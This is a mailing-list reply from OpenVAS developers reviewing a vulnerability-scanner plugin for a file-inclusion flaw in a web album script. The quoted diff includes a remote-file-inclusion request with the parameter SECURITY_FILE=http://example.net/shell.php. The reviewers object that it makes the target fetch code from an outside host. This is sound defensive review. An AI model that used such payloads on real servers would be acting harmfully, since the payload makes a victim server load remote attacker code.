Geoff Galitz wrote: > > >> I really don't think that plugins should be running with references >> to injection code that is hosted on an uncontrolled 3rd party site. >> That allows for introducing untrusted code into the scanner. > > ... > >>> trunk/openvas-plugins/scripts/gb_dm_filemanager_file_inc_vuln.nasl >> e >> >>> + sndReq = http_get(item:dmfVer[2] + "/dm-albums/template/album.php?" + >>> + "SECURITY_FILE=http://example.net/shell.php";, > > Does that code work? I was under the impression that a network connection > to a third host was prohibited by the scanning engine (that is, the scanning > engine would connect only to the target host to be scanned on a script by > script basis).
In this case, the engine is sending to the tested web server application a request that tricks that web server into connecting to an outside web site. The severity is mitigated by the fact that the example.com|org|net domains are reserved by IANA, and are unlikely to host malicious code. But given there is an alternative, I don't think this approach should be used. > > If that does work, I whole heartedly agree with Thomas. Connections to > remote sites is risky. Perhaps allowing connections to alternate hosts > within the same network would be ok... but connecting out from the target > network should be a big no-no. > > -geoff > Thomas _______________________________________________ Openvas-devel mailing list Openvas-devel@wald.intevation.org http://lists.wald.intevation.org/mailman/listinfo/openvas-devel
